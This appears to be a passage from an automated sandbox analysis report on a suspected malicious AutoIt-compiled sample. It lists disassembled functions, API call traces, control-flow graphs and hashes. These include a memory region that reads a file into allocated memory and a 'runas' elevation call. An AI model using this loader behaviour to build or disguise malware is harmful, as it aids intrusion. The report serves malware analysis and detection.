                                                                                      • LockResource.KERNEL32(00C150AA,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20,?), ref: 00C535E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: a81b450935b30b3287b089d41ece0d4693275a3ad6d6da2d72b8b11fd69739a2
                                                                                      • Instruction ID: 4c0e2933427ecad6c5d3e03e0c0412d0cbe54eecea7ad962aab9cb8bd1a80479
                                                                                      • Opcode Fuzzy Hash: a81b450935b30b3287b089d41ece0d4693275a3ad6d6da2d72b8b11fd69739a2
                                                                                      • Instruction Fuzzy Hash: 9C118E74200701BFD7258B65DC88F6B7BBAEBC6B55F104269F412D7290DB71DD809630
                                                                                      Function 00C52BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C12B6B
                                                                                        • Part of subcall function 00C13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CE1418,?,00C12E7F,?,?,?,00000000), ref: 00C13A78
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00CD2224), ref: 00C52C10
                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00CD2224), ref: 00C52C17
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                      • String ID: runas
                                                                                      • API String ID: 448630720-4000483414
                                                                                      • Opcode ID: 56e614a3d8627533036c3948bbe2dc933a0a568f25fc9b255f9d8db06e618a95
                                                                                      • Instruction ID: 043c371ec30d91d6f84e777cb1e76fb961f4dc176c549995510bac20d38490db
                                                                                      • Opcode Fuzzy Hash: 56e614a3d8627533036c3948bbe2dc933a0a568f25fc9b255f9d8db06e618a95
                                                                                      • Instruction Fuzzy Hash: D611D2312083819BC714FF60D8A1AFE77A49B93314F48142EB593061A2CF308ADAB752
                                                                                      Function 00C1D730 Relevance: 21.6, APIs: 14, Instructions: 624windowsleeptimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 00C1D807
                                                                                      • timeGetTime.WINMM ref: 00C1DA07
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1DB28
                                                                                      • TranslateMessage.USER32(?), ref: 00C1DB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 00C1DB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1DB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00C1DBB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                      • String ID:
                                                                                      • API String ID: 2189390790-0
                                                                                      • Opcode ID: 47c827307a4c5e6bfd2fd2c00acdf45662a101ed54050f201d4b49357ccbdfef
                                                                                      • Instruction ID: 90e365294742a14d75217ce096e4bc14b5023af810bcd387cbabac1582fb299d
                                                                                      • Opcode Fuzzy Hash: 47c827307a4c5e6bfd2fd2c00acdf45662a101ed54050f201d4b49357ccbdfef
                                                                                      • Instruction Fuzzy Hash: B842D130608741EFD738CF25C894BAAB7E0BF86314F18455DE8668B291D774E984EB92
                                                                                      Function 00C12CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C12D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 00C12D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C12D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00C12D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C12D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 00C12D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C12D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: 36a716933413980eb2cb5f4cf1b4d77d3d1495a68966a44cfb71b26ed5d91faf
                                                                                      • Instruction ID: 1c7d4c877c04d4dfb3d4564492cf2e7cd79d5ae21b4bb76a43912dfe3b0da3b6
                                                                                      • Opcode Fuzzy Hash: 36a716933413980eb2cb5f4cf1b4d77d3d1495a68966a44cfb71b26ed5d91faf
                                                                                      • Instruction Fuzzy Hash: CA21C0B5901258AFDB00DFA4E889BEDBBB4FB09704F04811AF911AB2A0D7B54594CFA1
                                                                                      Function 00C5065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 302 c5065b-c5068b call c5042f 305 c506a6-c506b2 call c45221 302->305 306 c5068d-c50698 call c3f2c6 302->306 312 c506b4-c506c9 call c3f2c6 call c3f2d9 305->312 313 c506cb-c50714 call c5039a 305->313 311 c5069a-c506a1 call c3f2d9 306->311 323 c5097d-c50983 311->323 312->311 321 c50716-c5071f 313->321 322 c50781-c5078a GetFileType 313->322 327 c50756-c5077c GetLastError call c3f2a3 321->327 328 c50721-c50725 321->328 324 c507d3-c507d6 322->324 325 c5078c-c507bd GetLastError call c3f2a3 CloseHandle 322->325 330 c507df-c507e5 324->330 331 c507d8-c507dd 324->331 325->311 339 c507c3-c507ce call c3f2d9 325->339 327->311 328->327 332 c50727-c50754 call c5039a 328->332 335 c507e9-c50837 call c4516a 330->335 336 c507e7 330->336 331->335 332->322 332->327 345 c50847-c5086b call c5014d 335->345 346 c50839-c50845 call c505ab 335->346 336->335 339->311 352 c5086d 345->352 353 c5087e-c508c1 345->353 346->345 351 c5086f-c50879 call c486ae 346->351 351->323 352->351 355 c508c3-c508c7 353->355 356 c508e2-c508f0 353->356 355->356 358 c508c9-c508dd 355->358 359 c508f6-c508fa 356->359 360 c5097b 356->360 358->356 359->360 361 c508fc-c5092f CloseHandle call c5039a 359->361 360->323 364 c50931-c5095d GetLastError call c3f2a3 call c45333 361->364 365 c50963-c50977 361->365 364->365 365->360
                                                                                      APIs
                                                                                        • Part of subcall function 00C5039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C50704,?,?,00000000,?,00C50704,00000000,0000000C), ref: 00C503B7
                                                                                      • GetLastError.KERNEL32 ref: 00C5076F
                                                                                      • __dosmaperr.LIBCMT ref: 00C50776
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00C50782
                                                                                      • GetLastError.KERNEL32 ref: 00C5078C
                                                                                      • __dosmaperr.LIBCMT ref: 00C50795
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C507B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C508FF
                                                                                      • GetLastError.KERNEL32 ref: 00C50931
                                                                                      • __dosmaperr.LIBCMT ref: 00C50938
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 4237864984-2852464175
                                                                                      • Opcode ID: 35a7adf53de6d4f703e6893153b5827e42c5896310c07152b4f0b1f9018ea977
                                                                                      • Instruction ID: 30d99db9e7d8987fb7ddf2dd052cac0213afdccb5a6eb3ea9ddab646c7530014
                                                                                      • Opcode Fuzzy Hash: 35a7adf53de6d4f703e6893153b5827e42c5896310c07152b4f0b1f9018ea977
                                                                                      • Instruction Fuzzy Hash: 9EA12636A101448FDF19AF68D891BAE3BA0AB06321F24015DFC21DF2E2DB319957DB95
                                                                                      Function 00C1344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00C13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CE1418,?,00C12E7F,?,?,?,00000000), ref: 00C13A78
                                                                                        • Part of subcall function 00C13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C13379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C1356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C5318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C531CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C53210
                                                                                      • _wcslen.LIBCMT ref: 00C53277
                                                                                      • _wcslen.LIBCMT ref: 00C53286
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                      • API String ID: 98802146-2727554177
                                                                                      • Opcode ID: e867557ba1ee7cca523b41a5b8331571abff18de0270d266e31c867408b4a5e6
                                                                                      • Instruction ID: 8687072356afe90e85c7c45855d5cd7d6f0c682baf913dfb78799dff174b804e
                                                                                      • Opcode Fuzzy Hash: e867557ba1ee7cca523b41a5b8331571abff18de0270d266e31c867408b4a5e6
                                                                                      • Instruction Fuzzy Hash: 297148714043819AC314DF65EC82BAFBBECBB86744F40042EF555861B1EB749A89AB62
                                                                                      Function 00C12B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C12B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00C12B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 00C12BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 00C12BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 00C12BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C12BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 00C12C40
                                                                                        • Part of subcall function 00C12CD4: GetSysColorBrush.USER32(0000000F), ref: 00C12D07
                                                                                        • Part of subcall function 00C12CD4: RegisterClassExW.USER32(00000030), ref: 00C12D31
                                                                                        • Part of subcall function 00C12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C12D42
                                                                                        • Part of subcall function 00C12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00C12D5F
                                                                                        • Part of subcall function 00C12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C12D6F
                                                                                        • Part of subcall function 00C12CD4: LoadIconW.USER32(000000A9), ref: 00C12D85
                                                                                        • Part of subcall function 00C12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C12D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: 1e8d95ca539a424fa21e4a85b22152be31a50f8e700745a489dc7f95bbc2b61a
                                                                                      • Instruction ID: 19a7c52f90b5c3769f736ce362bbd25ec9bb12484476cf9ad94fbf5ac86883ab
                                                                                      • Opcode Fuzzy Hash: 1e8d95ca539a424fa21e4a85b22152be31a50f8e700745a489dc7f95bbc2b61a
                                                                                      • Instruction Fuzzy Hash: 87210974E00358ABDB109FA5ECD5BAD7FB4FB49B54F08001AEA00AB6B0D7B115A0DF90
                                                                                      Function 00C13170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 443 c13170-c13185 444 c131e5-c131e7 443->444 445 c13187-c1318a 443->445 444->445 446 c131e9 444->446 447 c131eb 445->447 448 c1318c-c13193 445->448 449 c131d0-c131d8 DefWindowProcW 446->449 450 c131f1-c131f6 447->450 451 c52dfb-c52e23 call c118e2 call c2e499 447->451 452 c13265-c1326d PostQuitMessage 448->452 453 c13199-c1319e 448->453 459 c131de-c131e4 449->459 454 c131f8-c131fb 450->454 455 c1321d-c13244 SetTimer RegisterWindowMessageW 450->455 489 c52e28-c52e2f 451->489 460 c13219-c1321b 452->460 457 c131a4-c131a8 453->457 458 c52e7c-c52e90 call c7bf30 453->458 461 c13201-c13214 KillTimer call c130f2 call c13c50 454->461 462 c52d9c-c52d9f 454->462 455->460 464 c13246-c13251 CreatePopupMenu 455->464 465 c52e68-c52e77 call c7c161 457->465 466 c131ae-c131b3 457->466 458->460 484 c52e96 458->484 460->459 461->460 468 c52dd7-c52df6 MoveWindow 462->468 469 c52da1-c52da5 462->469 464->460 465->460 473 c52e4d-c52e54 466->473 474 c131b9-c131be 466->474 468->460 476 c52da7-c52daa 469->476 477 c52dc6-c52dd2 SetFocus 469->477 473->449 478 c52e5a-c52e63 call c70ad7 473->478 482 c13253-c13263 call c1326f 474->482 483 c131c4-c131ca 474->483 476->483 485 c52db0-c52dc1 call c118e2 476->485 477->460 478->449 482->460 483->449 483->489 484->449 485->460 489->449 493 c52e35-c52e48 call c130f2 call c13837 489->493 493->449
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C1316A,?,?), ref: 00C131D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00C1316A,?,?), ref: 00C13204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C13227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C1316A,?,?), ref: 00C13232
                                                                                      • CreatePopupMenu.USER32 ref: 00C13246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00C13267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 039ac230a89d2739593066b7c360b7df18809a245513bd8cbedca2e4ded0b36c
                                                                                      • Instruction ID: d46796c791ab758441ec2adf3e18bdbcba7e6592128a4572dddf4386568b1ef1
                                                                                      • Opcode Fuzzy Hash: 039ac230a89d2739593066b7c360b7df18809a245513bd8cbedca2e4ded0b36c
                                                                                      • Instruction Fuzzy Hash: 6B4104353402C4ABDF156B789D8EBFD3A59E707348F180125FD229A1A2CB718BD0B7A5
                                                                                      Function 014E1EE0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 499 14e1ee0-14e1f8e call 14df910 502 14e1f95-14e1fbb call 14e2df0 CreateFileW 499->502 505 14e1fbd 502->505 506 14e1fc2-14e1fd2 502->506 507 14e210d-14e2111 505->507 514 14e1fd9-14e1ff3 VirtualAlloc 506->514 515 14e1fd4 506->515 508 14e2153-14e2156 507->508 509 14e2113-14e2117 507->509 511 14e2159-14e2160 508->511 512 14e2119-14e211c 509->512 513 14e2123-14e2127 509->513 518 14e21b5-14e21ca 511->518 519 14e2162-14e216d 511->519 512->513 520 14e2129-14e2133 513->520 521 14e2137-14e213b 513->521 516 14e1ffa-14e2011 ReadFile 514->516 517 14e1ff5 514->517 515->507 522 14e2018-14e2058 VirtualAlloc 516->522 523 14e2013 516->523 517->507 526 14e21cc-14e21d7 VirtualFree 518->526 527 14e21da-14e21e2 518->527 524 14e216f 519->524 525 14e2171-14e217d 519->525 520->521 528 14e213d-14e2147 521->528 529 14e214b 521->529 530 14e205f-14e207a call 14e3040 522->530 531 14e205a 522->531 523->507 524->518 532 14e217f-14e218f 525->532 533 14e2191-14e219d 525->533 526->527 528->529 529->508 539 14e2085-14e208f 530->539 531->507 535 14e21b3 532->535 536 14e219f-14e21a8 533->536 537 14e21aa-14e21b0 533->537 535->511 536->535 537->535 540 14e20c2-14e20d6 call 14e2e50 539->540 541 14e2091-14e20c0 call 14e3040 539->541 546 14e20da-14e20de 540->546 547 14e20d8 540->547 541->539 549 14e20ea-14e20ee 546->549 550 14e20e0-14e20e4 CloseHandle 546->550 547->507 551 14e20fe-14e2107 549->551 552 14e20f0-14e20fb VirtualFree 549->552 550->549 551->502 551->507 552->551
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014E1FB1
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014E21D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                      • Instruction ID: 5c64279c1234a341c3f9ef270af726ee7124712b446e390b85fdd54d66c51e3a
                                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                      • Instruction Fuzzy Hash: A2A10874E00209EBDB14CFA4C958FAEBBB5FF48305F10815AE601BB291C7B59A41CB94
                                                                                      Function 00C12C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 563 c12c63-c12cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C12C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C12CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C11CAD,?), ref: 00C12CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C11CAD,?), ref: 00C12CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: 04508420b977fb657a491599c7604e435da302b71b7bc093500f792bc9eb9996
                                                                                      • Instruction ID: cc0d41caf27f697318ed4449e5c5936f409a6610955256f16a3eda67aebd9d68
                                                                                      • Opcode Fuzzy Hash: 04508420b977fb657a491599c7604e435da302b71b7bc093500f792bc9eb9996
                                                                                      • Instruction Fuzzy Hash: 32F0DA755402D47AEB311B27AC88F7B2EBDD7C7F54B04005AFD00AB5B0C6755861DAB0
                                                                                      Function 014E1CC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 678 14e1cc0-14e1ddb call 14df910 call 14e1bb0 CreateFileW 685 14e1ddd 678->685 686 14e1de2-14e1df2 678->686 687 14e1e92-14e1e97 685->687 689 14e1df9-14e1e13 VirtualAlloc 686->689 690 14e1df4 686->690 691 14e1e17-14e1e2e ReadFile 689->691 692 14e1e15 689->692 690->687 693 14e1e32-14e1e6c call 14e1bf0 call 14e0bb0 691->693 694 14e1e30 691->694 692->687 699 14e1e6e-14e1e83 call 14e1c40 693->699 700 14e1e88-14e1e90 ExitProcess 693->700 694->687 699->700 700->687
                                                                                      APIs
                                                                                        • Part of subcall function 014E1BB0: Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014E1DD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: X4UVO3E0MP5J
                                                                                      • API String ID: 2694422964-555495244
                                                                                      • Opcode ID: adff3ce46d64045890554bc584fbb9e08203bd8ce1765d6f680d0dff634e6667
                                                                                      • Instruction ID: d3754af7e05bce0d68328c622c9729436387647aed7a16878ee67a59fe7c4f49
                                                                                      • Opcode Fuzzy Hash: adff3ce46d64045890554bc584fbb9e08203bd8ce1765d6f680d0dff634e6667
                                                                                      • Instruction Fuzzy Hash: F2519230D54249EBEF10DBE4C818BEFBBB5AF14701F004199E608BB2D0D6791B45CBA5
